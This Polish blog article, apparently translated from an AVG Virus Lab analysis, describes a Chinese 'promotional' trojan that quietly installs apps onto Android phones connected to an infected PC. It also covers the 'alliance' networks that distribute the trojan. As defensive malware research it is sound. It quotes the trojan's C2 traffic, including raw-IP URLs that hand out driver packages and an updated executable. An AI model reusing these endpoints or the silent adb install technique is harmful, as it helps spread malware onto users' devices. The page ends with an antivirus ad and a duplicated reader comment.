Rzeczywistość wysoce konkurencyjnych sklepów z aplikacjami na smartfony sprawia, że niektórzy developerzy zwiększają popularność nielegalnych sklepów poprzez wykorzystanie wirusów, które po cichu instalują aplikacje na waszych urządzeniach.
Badacze AVGVirusLab przeglądali niedawno chiński sklep Android App i natknęli się na złośliwe oprogramowanie (Malware), które ma niebywały efekt uboczny. Oprogramowanie to „po cichu” (nie powiadamiając użytkownika) instaluje aplikacje na urządzeniach z Androidem, które są podłączone do danego komputera.
Biorąc pod uwagę środowisko oraz rozmach sklepów takich jak Google Play (gdzie ilość dostępnych aplikacji sięga 1,9 miliona) sytuacja, w której developerzy sięgają po takie chwyty wcale nie dziwi. Reklamowanie nowej aplikacji staje się coraz trudniejsze, a co więcej – droższe.
Przykładowym sposobem przyciągania zainteresowania użytkowników jest preinstalacja aplikacji. Jest to jednak rozwiązanie niewspółmiernie drogie i wymagające odpowiednich umów z ograniczoną ilością producentów urządzeń.
Jednakże chiński nielegalny rynek aplikacji pozwala developerom na dotarcie do użytkowników poprzez skorzystanie z tańszej alternatywy preinstalacji. Oferuje specjalne programy „alliance” (sojusz, spółka) takie jak na przykład „cyber café alliance” czy „fast step union.”
Dołączenie do takiego programu umożliwia skorzystanie z usług różnorodnych grup takich jak hakerzy, dystrybutorzy, kafejki internetowe, strony phishingowe (wyłudzające informacje), serwery, itd. Takie grupy są dobrze zorganizowane i działają systematycznie ze skupieniem na usługach sprzedaży oraz dystrybucji.
Poniżej opisujemy działanie typowego trojana „promocyjnego” – złośliwego oprogramowania, zaprojektowanego, aby wspierać promocję oraz dystrybucję software’u oraz aplikacji, stosując podejrzane metody.
W tym konkretnym przypadku sprawa rozpoczyna się od pobrania wirusa na komputer, mimo, że nie ma ono na celu zainfekowania samego komputera. Następnie, oprogramowanie przebiegle „pomaga” zainstalować nam sterowniki potrzebne do obsługi urządzeń mobilnych (jeśli jeszcze tego nie zrobiliśmy).
Później, już po instalacji złośliwego oprogramowania, za każdym razem kiedy podłączycie swoje urządzenie mobilne do komputera pobierze ono „promocyjną listę aplikacji” i zainstaluje je „po cichu” na waszym urządzeniu.
Pobieranie sterowników urządzenia z serwera:
Odpowiedź serwera:
{ “platform”:”android”, “service”:”winusb”, “args”:””, “dl”:”//222.186.60.89:1001/driver/Android/Google/Google64.zip”, “md5″:””, “size”:”” }
Pobieranie Adb oraz innych komponentów:
Pobieranie Listy aplikacji:
Instalacja aplikacji przy użyciu adb.exe:
Wszystkie aplikacje widoczne poniżej zostały zainstalowane przez wirusa:
Zauważyliśmy, że oprogramowanie jest regularnie aktualizowane. W chwili pisania tego artykułu wersja 1.7 była najnowszą jego wersją. Warto zaznaczyć, że trojan za każdym razem łączy się ze zdalnym serwerem celem aktualizacji do najnowszej wersji.
Zapytanie do serwera o potwierdzenie wersji:
//222.186.60.89:9023/?action=getVersion&pcid=6C78A9C3_%3CMACHINE_NAME%3E&nowVer=1.1&pid=109&subpid=&runas=exe
Odpowiedź serwera:
{ „renew” : „0”, „version” : „1.7”, „dl” : „//222.186.60.128:1123/setup/appmain.v1.7.exe” }
Nie sposób również nie zauważyć, że ten trojan jest już rozwijany od jakiegoś czasu. Poniżej znajdziecie historie aktualizacji, które udało nam się zaobserwować. Całkiem możliwe, że nad jego rozwojem i utrzymaniem, pracuje cały zespół ludzi.
W jaki sposób jednakże, takie oprogramowanie dostaje się na komputery poszczególnych użytkowników? Odpowiedź jest prosta: poprzez modele typu „alliance”, o których pisaliśmy wcześniej.
W naszych badaniach skupiliśmy się na dwóch takich sojuszach nazwanych „领跑吧网吧联盟 (Leadingrunnercyber café alliance)” oraz „快步网盟 (Fast step net union).”
Aby ochronić was przed tego typu złośliwym oprogramowaniem, wprowadziliśmy aktualizację, po której AVG zaczęło je wykrywać jako „Agent5.ZRK” – jedno z wielu zagrożeń, przed którym chronimy was i wasze urządzenia (mobilne czy stacjonarne).
Znasz inne przykłady ofert typu „alliance”, a może znasz sposób w jaki zabezpieczyć swoje urządzenie z Androidem przeciwko takim praktykom? Podziel się z nami swoją wiedzą!
Źródło: //now.avg.com/pc-malware-that-silently-installs-apps-on-your-android-device/
___
Artykuł powstał dzięki CORE – polskiemu dystrybutorowi antywirusów AVAST i AVG. AVG Internet Security Unlimited to idealny antywirus dla androida. Jeżeli wysyłasz maile, korzystasz z banku z poziomu smartfona to ten program jest właśnie dla Ciebie.
Agresywny marketing 😉 Mam nadzieję, że aplikacje na oficjalnych stronach jak googleplay itp. są jakoś sprawdzane, ale zmniejszyć (gdyż wyeliminować całkowicie się pewnie nie da) ryzyko zainfekowania telefonu.
Ktoś może polecić jakieś zaufane strony z aplikacjami?
Agresywny marketing 😉 Mam nadzieję, że aplikacje na oficjalnych stronach jak googleplay itp. są jakoś sprawdzane, ale zmniejszyć (gdyż wyeliminować całkowicie się pewnie nie da) ryzyko zainfekowania telefonu. Ktoś może polecić jakieś zaufane strony z aplikacjami?